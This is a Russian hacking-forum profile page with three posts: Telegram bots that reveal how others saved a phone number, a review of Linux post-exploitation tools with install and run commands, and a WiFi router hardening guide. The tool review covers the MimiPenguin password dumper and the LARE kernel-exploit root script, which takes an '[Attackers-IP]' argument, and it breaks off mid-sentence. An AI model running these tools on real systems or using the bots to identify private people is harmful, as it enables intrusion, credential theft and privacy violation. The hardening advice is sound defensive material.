Перейти к содержимому


roguevad

Регистрация: 08 янв 2019
Offline Активность: июн 19 2022 11:58
-----

#28027 ​​Узнаем как записан номер телефона в контактах других людей

Написано roguevad : 25 Февраль 2021 - 01:28

Привет, хакеры! При проведении OSINT-расследований с целью идентифицировать человека по номеру телефона часто применяется поиск по базе данных GetContact. Напомним, что это приложение GetContact позволяет посмотреть, как записаны номера телефонов у других пользователей, но чтобы это сделать, необходимо предоставить приложению доступ к контактам своего телефона. 

 

GetContact называют самой большой аферой 2018 года, ведь практически каждый скачивал это приложение, чтобы посмотреть какие нелепые подписи придумали для их номера знакомые, добровольно отдавая приложению полный доступ к личной информации своих контактов. Таким образом приложению удалось сформировать базу данных, которая насчитывает уже более двух миллионов номеров телефона. 

 

Узнать, как записан тот или иной номер телефона в контактах других людей, не отдавая при этом полный дамп своей телефонной книги, можно с помощью телеграм-ботов @get_kontakt_bot и @clerkinfobot. Просто отправьте боту номер телефона и в ответ получите всю имеющуюся в базе информацию.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#27686 4 лучших инструмента для взлома Linux

Написано roguevad : 15 Июль 2020 - 01:55

Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше!

 

Пост-эксплуатация в практике пен-теста

Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.

 

Фазы (этапы) проведения тестирования на проникновение

Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации:

получить доступ на выполнение произвольного кода\команд

изучение данных, хранящихся на сервере

перехват данных, которых нет на системе сейчас, но они могут появиться в будущем

организация перманентного доступа к целевой системе

эскалация привилегий до уровня системы для непривилегированной учетной записи

Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры:

конфигурацию системы (логин и пароль к БД в исходных кодах)

конфигурацию веб-сервера (например, httpd.conf, .htaccess)

исходные коды приложения (поиск уязвимостей, анализируя логику приложения)

доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети)

базы данных (аутентификационная информация к другим системам, хранящаяся в них

 

Обзор инструментов пост-эксплуатации

Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы.

1. PXEenum — полное перечисление всего что есть в системе

Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время.

Для запуска он не требует прав root’а, работает в стандартном терминале.

#  wget https://raw.githubus...ster/PXEnume.sh

Установка:

# git clone https://github.com/s...uong/PXEnum.git

# cd PXEnum/

# chmod +x PXEnum.sh 

# bash PXEnum.sh 

 

2. MIDA Multitool — палим систему по взрослому

Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно:

SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д.

Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев.

Устанавливаем скрипт в систему с github:

# git clone https://github.com/N...h-Kit-Multitool

# cd Bash-Kit-Multitool

# chmod +x bashkit.sh

Запускаем скрипт:

# /.bashkit.sh

Дело сделано! Можно запускать в системе!

3. MimiPenguin — тырим пароли без зазрения совести

Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей)

 

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux.

 

Устанавливаем MimiPenguin забирая его с репозитория GitHub:

  # git clone https://github.com/h...gal/mimipenguin

  # cd mimipenguin

  # ls –a

  # chmod +x mimipenguin.sh

  # ./mimipenguin.sh

 

4. LARE — ломимся под рута используя баги ядра

И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8.

Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP.

Устанавливаем скрипт в систему:

# git clone https://github.com/EnigmaDimitri/LARE && cd LARE

# chmod +x LARA.sh

# LARE.sh -a 

Запуск скрипта на целевой машине в сети

# LARE.sh -l [Attackers-IP] 

Запуск на машине с подключением к базе данных эксплойтов на GitHub

# LARE.sh -l or ./LARE.sh -l 

 

Проверка и защита системы от техник пост-эксплуатации

Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,

 

 




#27417 Защита вашего WiFi роутера от взлома.

Написано roguevad : 08 Январь 2019 - 01:20

Приветствую всех хакеров, у тебя есть дома WiFi? А ты уверен что он находится под надежной защитой? Думаешь написал хороший и пароль и все збс? А вот и хрен, хороший пароль это только один из пунктов защиты, в данной статье мы рассмотрим 13 пунктов, которые улучшат ваш роутер:

 

Расскажу одну историю, которая до сих пор продолжается у одного поставщика интернета в моем городе. Как-то раз я зашел к другу и попросил у него пароль к WiFi. Сеть сохранилась в смартфоне. Находясь в другой части города, я неожиданно заметил, что опять подключен к WiFi друга. Как же это произошло? Как оказалось, интернет-провайдер установил одинаковые имена сети и пароли на все роутеры, которые устанавливались абонентам при подключении. Прошло много времени, а я до сих пор могу пользоваться бесплатным Wi-Fi почти в любом дворе. Логин и пароль для доступа к роутерам тоже одинаковые :)

 

Чем опасен несанкционированный доступ к вашему Wi-Fi и роутеру

 

Представьте, что злоумышленник получил доступ к вашему WiFi, скачал пару гигабайт детской порнографии и разместил несколько сотен экстремистских сообщений. Договор на оказание интернет-услуг оформлен на вас, и нести ответственность за нарушение закона, естественно, будете тоже вы.

Даже если подключившийся не будет заниматься правонарушениями, то он вполне может сутками качать и раздавать огромные файлы (в том числе запрещенный контента с торрентов), что плохо скажется на скорости и стабильной работе интернета. В сети есть множество рассказов о халявном WiFi за стенкой. Так может, вы тоже являетесь добрым соседом?

Если посторонний человек знает и логин к вашему роутеру, то у вас появляются все выше указанные риски, а так же появляются несколько других.

 

Например, человек просо меняет пароль к WiFi и вы лишаетесь выхода в интернет. Если произойдет смена пароля, то вам придется сбрасывать настройки роутера к заводским и заново проводить настройку ( или вызывать специалиста, в случае отсутствия навыков), чтобы обратно получить контроль над своим оборудованием. Так же сброс этих настроек может выполнить и сам злоумышленник.

 

Абсолютной защиты не существует, но вам она и не нужна

 

Есть много способов для взлома сети. Вероятность взлома прямо пропорциональная мотивации и профессионализму хакера. Если у вас нету личных врагов и вы не обладаете какой-либо ценной информацией, то вряд ли вас будут целенаправленно пытаться взломать.

Чтобы не дать случайным прохожим и другим любителей халявы воспользоваться вашей сетью, нужно всего лишь закрыть элементарные дыры безопасности. Если такой человек встретит малейшее сопротивление при попытке взлома, то с большой вероятностью он откажется от этой идеи и попробует найти жертву полегче.

 

Получите доступ к своему WiFi роутеру

Сперва вам нужно взять под полный контроль свой роутер. Вот что вам необходимо знать:

  • IP-адрес роутера.
  • Логин и пароль для доступа к настройкам роутера.

Чтобы узнать IP роутера, достаточно перевернуть устройство и посмотреть на наклейку снизу. Там, помимо другой информации, будет указан IP. Чаще всего это 192.168.1.1 или 192.168.0.1.

Также IP роутера можно узнать в руководстве пользователя. Если же короба с инструкцией от устройства была утеряна, то найти руководство пользователя может помочь Google, в электронном виде.

Адрес роутера можно узнать самостоятельно

1. В Windows нажмите сочетание клавиш Windows + R.

2. В появившемся окне введите cmd и нажмите Enter.

3. В появившемся окне введите ipconfig и нажмите Enter.

4. Найдите строку “Основной шлюз”. Это и будет вашем IP-адресом роутера.

 

Введите данный IP-адрес в браузере. Перед вами появится страница, где вы сможете войти в настройки роутера.

Тут необходимо ввести логин и пароль, которые вы должны иметь. Чаще всего логином является слово admin, а паролем – либо пустое поле, либо также admin (логин и пароль также указаны на нижней части роутера). Если роутер был получен от интернет-провайдера, то позвоните ему и выясняйте.

Если у вас нет возможности изменить настройки, то по факту вы лишаетесь контроля над своим роутером. Даже если будет необходимо провести сброс настроек и заново его настроить, то оно того стоит. Чтобы избежать от будущих проблем с доступом, запишете логин и пароль и храните эти данные в надежном месте, где не будет доступа посторонних людей.

 

        1.Придумайте надёжный пароль для доступа к роутеру

 

Теперь, получив доступ к своему оборудованию, первым делом нужно изменить пароль. Интерфейс роутера отличается в зависимости от производителя, конкретной модели и версии прошивки. Здесь, а так же при выполнении других действий для улучшения защиты, вам поможет руководство пользователя.

 

     2.Придумайте уникальное имя (SSID) для вашей WiFi-сети

 

Если ваши соседи ничего не смыслят в технологиях, то название сети типа virus.exe или fsbwifi может убрать их желание взлома. Но на самом деле, уникальное имя поможет вам легче ориентироваться среди других точек и точно идентифицировать свою сеть.

 

     3.Придумайте надёжный пароль для WIFI-сети

 

Как только вы создадите точку без пароля, то по факту, вы сделаете ее общедоступной для всех. А надежный пароль не даст подключится к вашей сети посторонним людям.

 

     4.Сделайте вашу WiFi-сеть невидимой

 

Вы можете снизить вероятность попытки взлома вашей сети, если ее будет невозможно обнаружить без специальных программ. Поэтому скрытие имени точки доступа – повысит безопасность.

 

     5.Включите шифрование

 

Новые роутеры поддерживают разнообразные методы шифрования ваших данных, передаваемых по беспроводной сети, в том числе WEP, WPA и WPA2. WEP уступает другим по уровню защиты, однако поддерживается на более старом оборудовании. Оптимальным решением для защиты данных является WPA2.

 

     6.Отключите WPS

 

WPS был создан как простой способ для создание сетей, но оказался очень уязвимым к взлому. Поэтому следует отключить WPS в настройках.

 

     7.Включите фильтрацию по MAC-адресам

 

Настройки роутеров позволяют фильтровать доступ по уникальным идентификаторам, называемым MAC-адресом. У любого устройства, которое имеет сетевую карту или сетевой интерфейс, имеет свой уникальный MAC-адрес.

Вы можете создать список MAC-адресов для предоставления доступа или же наоборот, запретить подключению к точки доступа определенным MAC-адресам.

При должном желании человек может подделывать свой MAC-адрес, но для обычного, неопытного пользователя это маловероятно.

 

     8.Уменьшите радиус сигнала WiFi

 

Роутеры дают возможность изменять мощность сигнала, таким образом увеличивая или уменьшая радиус действия сети. Скорее всего, вы пользуетесь WiFi у себя дома или в офисе. Таким образом, понизив мощность передачи сигнала до того значения, когда сигнал можно получить только в пределах вашего помещения, вы, с одной стороны, делаете сеть менее заметной, а с другой стороны, вы будете создавать меньше помех соседским роутерам.

 

     9.Обновите прошивку роутера

 

Не бывает идеальных технологий. Умельцы всегда смогут найти уязвимость, поэтому производители их устраняют и выпускают так называемые “заплатки” для уже существующих устройств. Обновляя прошивку своего роутера, вы уменьшаете вероятность того, что хакер сможет воспользоваться ошибками и недоработками старых версий для обхода защиты и доступа к вашей сети.

 

     10.Заблокируйте удалённый доступ к роутеру

 

Если вы защитите свою сеть и доступ к настройкам самыми надежными паролями, злоумышленники все равно смогу получить доступ к роутеру через всемирную паутину. Чтобы увеличить безопасность устройства от таких вмешательств, вам потребуется отключить функцию удаленного доступа в ваших настройках.

 

     11.Файрвол

 

Некоторые роутеры имеют свой собственный файрвол – средство защиты от сетевых атак. Найдите в настройках роутера функцию с названиями Firewall, “Брандмауэр” или “Сетевой экран” и включите ее, конечно, если она имеется. Если найдете дополнительные настройки фаервола, то прочтите как их настроить. (информация имеется в официальной инструкции)

 

     12.VPN

 

VPN-сервисы создают что-то вроде шифрованного туннеля для безопасной передачи данных между вашим устройством и сервером. Данная технология уменьшает вероятность утечки личной информации и повышает анонимность пользователя.

Чтобы использовать VPN, необходимо установить на ваш гаджет специальную программу. Такое программное обеспечение существует как для смартфонов, так и для компьютеров. Но не забывайте, что некоторые маршрутизаторы можно подключать в VPN-сервисам. Эта функция позволит защитить сразу все гаджеты подключенные к сети, даже если на них на прямую не установлено никаких программ.

Узнать о том, поддерживает ли ваш роутер VPN, вы можете в инструкции или на сайте производителя.


  • Это нравится: Admin